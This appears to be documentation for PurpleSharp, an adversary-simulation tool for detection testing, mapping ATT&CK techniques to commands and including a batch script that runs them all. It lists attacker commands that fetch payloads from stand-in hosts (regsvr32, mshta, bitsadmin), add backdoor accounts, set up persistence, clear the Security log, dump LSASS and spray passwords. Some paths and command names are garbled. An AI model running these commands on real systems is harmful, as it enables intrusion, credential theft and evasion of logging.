PurpleSharp

Command and Scripting Interpreter: PowerShell
.\PurpleSharp_x64.exe /t T1059.001

Variation 1
This module uses the Win32 API CreateProcess to execute a specific command:
powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
Variation 2
This module uses the the System.Management.Automation .NET namespace to execute the same script.

Command and Scripting Interpreter: Windows Command Shell
.\PurpleSharp_x64.exe /t T1059.003

This module uses the Win32 API CreateProcess to execute a specific command:
cmd.exe /C whoami
Command and Scripting Interpreter: Visual Basic
.\PurpleSharp_x64.exe /t T1059.005

This module uses the Win32 API CreateProcess to execute a specific command:
wscript.exe invoice0420.vbs
Command and Scripting Interpreter: JavaScript/JScript
.\PurpleSharp_x64.exe /t T1059.007

This module uses the Win32 API CreateProcess to execute a specific command:
wscript.exe invoice0420.js
System Services: Service Execution
.\PurpleSharp_x64.exe /t T1569.002

This module uses the Win32 API CreateProcess to execute a specific command:
net start UpdaterService
Scheduled Task/Job: Scheduled Task
.\PurpleSharp_x64.exe /t T1053.005

This module uses the Win32 API CreateProcess to execute a specific command:
SCHTASKS /CREATE /SC DAILY /TN BadScheduledTask /TR “C:WindowsTempxyz12345.exe” /ST 13:00
Create Account: Local Account
.\PurpleSharp_x64.exe /t T1136.001

Variation 1
This module uses the Win32 API NetUserAdd to create a local account.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
net user hax0r Passw0rd123El7 /add
Create or Modify System Process: Windows Service
.\PurpleSharp_x64.exe /t T1543.003

Variation 1
This module uses the Win32 API CreateService to create a Windows Service.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
sc create UpdaterService binpath= C:WindowsTempsuperlegit.exe type= own start= auto
Boot or Logon Autostart Execution: Registry Run Keys
.\PurpleSharp_x64.exe /t T1547.001

Variation 1
This module uses the the Microsoft.Win32 .NET namespace to create a Registry Key.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
REG ADD HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /V BadApp /t REG_SZ /F /D C:WindowsTempxyz12345.exe
Event Triggered Execution: Windows Management Instrumentation Event Subscription
.\PurpleSharp_x64.exe /t T1546.003

This module uses the System.Management .NET namespace to create the main pieces of a WMI Event Subscription: an Event Filter, an Event Consumer and a FilterToConsumerBinding.
Signed Binary Proxy Execution: Regsvr32
.\PurpleSharp_x64.exe /t T1218.010

This module uses the CreateProcess Win32 API to execute
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll
Signed Binary Proxy Execution: Regsvcs/Regasm
.\PurpleSharp_x64.exe /t T1218.009

This module uses the CreateProcess Win32 API to execute
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U winword.dll
Signed Binary Proxy Execution: InstallUtil
.\PurpleSharp_x64.exe /t T1218.004

This module uses the CreateProcess Win32 API to execute
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfiles /LogToConsole=alse /U C:WindowsTempXKNqbpzl.exe
Deobfuscate/Decode Files or Information
.\PurpleSharp_x64.exe /t T1140

This module uses the CreateProcess Win32 API to execute
certutil.exe -decode encodedb64.txt decoded.exe
Signed Binary Proxy Execution: Mshta
.\PurpleSharp_x64.exe /t T1218.005

This module uses the CreateProcess Win32 API to execute
mshta.exe http://webserver/payload.hta
Signed Binary Proxy Execution: CMSTP
.\PurpleSharp_x64.exe /t T1218.003

This module uses the CreateProcess Win32 API to execute
cmstp.exe /s /ns C:UsersAdministratorAppDataLocalTempXKNqbpzl.txt
BITS Jobs
.\PurpleSharp_x64.exe /t T1197

This module uses the CreateProcess Win32 API to execute
bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:WindowsTempwinword.exe
Signed Binary Proxy Execution: Rundll32
.\PurpleSharp_x64.exe /t T1218.011

This module uses the CreateProcess Win32 API to execute
rundll32.ex C:Windowstwain_64.dll
Indicator Removal on Host: Clear Windows Event Logs
.\PurpleSharp_x64.exe /t T1070.001

Variation 1
This module uses the System.Diagnostics .NET namespace to delete the Security Event Log.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
wevtutil.exe cl Security
XSL Script Processing
.\PurpleSharp_x64.exe /t T1220

This module uses the CreateProcess Win32 API to execute
wmic.exe os get /FORMAT “http://webserver/payload.xsl”:
Process Injection: Portable Executable Injection
.\PurpleSharp_x64.exe /t T1055.002

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode.
Process Injection: Asynchronous Procedure Call
.\PurpleSharp_x64.exe /t T1055.004

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode.
Brute Force: Password Spraying
.\PurpleSharp_x64.exe /t T1110.003

Variation 1
This module uses the LogonUser Win32 API to test a single password across random users obtained via LDAP.
Variation 2
This module uses the WNetAddConnection2 Win32 API to test a single password across random users and random hosts obtained via LDAP.
Steal or Forge Kerberos Tickets: Kerberoasting
.\PurpleSharp_x64.exe /t T1558.003

This module uses the KerberosRequestorSecurityToken Class to obtain Kerberos service tickets.
OS Credential Dumping: LSASS Memory
.\PurpleSharp_x64.exe /t T1003.001

This module uses the GetProcessesByName and MiniDumpWriteDump Win32 API functions to create a memory dump of the lsass.exe process.
System Network Configuration Discovery
.\PurpleSharp_x64.exe /t T1016

This module uses the CreateProcess Win32 API to execute
ipconfig.exe /all”
File and Directory Discovery
.\PurpleSharp_x64.exe /t T1083

This module uses the CreateProcess Win32 API to execute
dir.exe c:>> %temp%download
dir.exe C:Users>> %temp%download
Network Share Discovery
.\PurpleSharp_x64.exe /t T1135

This module uses the NetShareEnum Win32 API function to enumerate shared on remote endpoints randomly picked using LDAP.
Network Service Scanning
.\PurpleSharp_x64.exe /t T1046

This module uses the System.Net.Sockets .NET namespace to scan ports on remote endpoints randomly picked using LDAP.
Account Discovery: Local Account
.\PurpleSharp_x64.exe /t T1087.001

This module uses the CreateProcess Win32 API to execute
net.exe user
Account Discovery: Domain Account
.\PurpleSharp_x64.exe /t T1087.002

Variation 1
This module uses the Sytem.DirectoryServices .NET NameSpace to query a domain environment using LDAP.
Variation 2
This module uses the CreatePRocess Win32 API to execute:
net.exe user /domain
System Service Discovery
.\PurpleSharp_x64.exe /t T1007

This module uses the CreateProcess Win32 API to execute
net.exe start
tasklist.exe /svc
System Owner/User Discovery
.\PurpleSharp_x64.exe /t T1033

This module uses the CreateProcess Win32 API to execute
whoami.exe
query user
System Network Connections Discovery
.\PurpleSharp_x64.exe /t T1049

This module uses the CreateProcess Win32 API to execute
netstat.exee
net.exe use
net.exe sessions
Remote Services: Windows Remote Management
.\PurpleSharp_x64.exe /t T1021.006

Audit.bat.

Download latest binary and run the following to perform all simulations

@echo off
ECHO "Command and Scripting Interpreter: PowerShell"
.\PurpleSharp_x64.exe /t T1059.001
timeout /t 5
ECHO "Command and Scripting Interpreter: Windows Command Shell"
.\PurpleSharp_x64.exe /t T1059.003
timeout /t 5
ECHO "Command and Scripting Interpreter: Visual Basic"
.\PurpleSharp_x64.exe /t T1059.005
timeout /t 5
ECHO "Command and Scripting Interpreter: JavaScript/JScript"
.\PurpleSharp_x64.exe /t T1059.007
timeout /t 5
ECHO "System Services: Service Execution"
.\PurpleSharp_x64.exe /t T1569.002
timeout /t 5
ECHO "Scheduled Task/Job: Scheduled Task"
.\PurpleSharp_x64.exe /t T1053.005
timeout /t 5
ECHO "Create Account: Local Account"
.\PurpleSharp_x64.exe /t T1136.001
timeout /t 5
ECHO "Create or Modify System Process: Windows Service"
.\PurpleSharp_x64.exe /t T1543.003
timeout /t 5
ECHO "Boot or Logon Autostart Execution: Registry Run Keys"
.\PurpleSharp_x64.exe /t T1547.001
timeout /t 5
ECHO "Event Triggered Execution: Windows Management Instrumentation Event Subscription"
.\PurpleSharp_x64.exe /t T1546.003
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvr32"
.\PurpleSharp_x64.exe /t T1218.010
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvcs/Regasm"
.\PurpleSharp_x64.exe /t T1218.009
timeout /t 5
ECHO "Signed Binary Proxy Execution: InstallUtil"
.\PurpleSharp_x64.exe /t T1218.004
timeout /t 5
ECHO "Deobfuscate/Decode Files or Information"
.\PurpleSharp_x64.exe /t T1140
timeout /t 5
ECHO "Signed Binary Proxy Execution: Mshta"
.\PurpleSharp_x64.exe /t T1218.005
timeout /t 5
ECHO "Signed Binary Proxy Execution: CMSTP"
.\PurpleSharp_x64.exe /t T1218.003
timeout /t 5
ECHO "BITS Jobs"
.\PurpleSharp_x64.exe /t T1197
timeout /t 5
ECHO "Signed Binary Proxy Execution: Rundll32"
.\PurpleSharp_x64.exe /t T1218.011
timeout /t 5
ECHO "Indicator Removal on Host: Clear Windows Event Logs"
.\PurpleSharp_x64.exe /t T1070.001
timeout /t 5
ECHO "XSL Script Processing"
.\PurpleSharp_x64.exe /t T1220
timeout /t 5
ECHO "Process Injection: Portable Executable Injection"
.\PurpleSharp_x64.exe /t T1055.002
timeout /t 5
ECHO "Process Injection: Asynchronous Procedure Call"
.\PurpleSharp_x64.exe /t T1055.004
timeout /t 5
ECHO "Brute Force: Password Spraying"
.\PurpleSharp_x64.exe /t T1110.003
timeout /t 5
ECHO "Steal or Forge Kerberos Tickets: Kerberoasting"
.\PurpleSharp_x64.exe /t T1558.003
timeout /t 5
ECHO "OS Credential Dumping: LSASS Memory"
.\PurpleSharp_x64.exe /t T1003.001
timeout /t 5
ECHO "System Network Configuration Discovery"
.\PurpleSharp_x64.exe /t T1016
timeout /t 5
ECHO "File and Directory Discovery"
.\PurpleSharp_x64.exe /t T1083
timeout /t 5
ECHO "Network Share Discovery"
.\PurpleSharp_x64.exe /t T1135
timeout /t 5
ECHO "Network Service Scanning"
.\PurpleSharp_x64.exe /t T1046
timeout /t 5
ECHO "Account Discovery: Local Account"
.\PurpleSharp_x64.exe /t T1087.001
timeout /t 5
ECHO "Account Discovery: Domain Account"
.\PurpleSharp_x64.exe /t T1087.002
timeout /t 5
ECHO "System Service Discovery"
.\PurpleSharp_x64.exe /t T1007
timeout /t 5
ECHO "System Owner/User Discovery"
.\PurpleSharp_x64.exe /t T1033
timeout /t 5
ECHO "System Network Connections Discovery"
.\PurpleSharp_x64.exe /t T1049
timeout /t 5
ECHO "Remote Services: Windows Remote Management"
.\PurpleSharp_x64.exe /t T1021.006

Last updated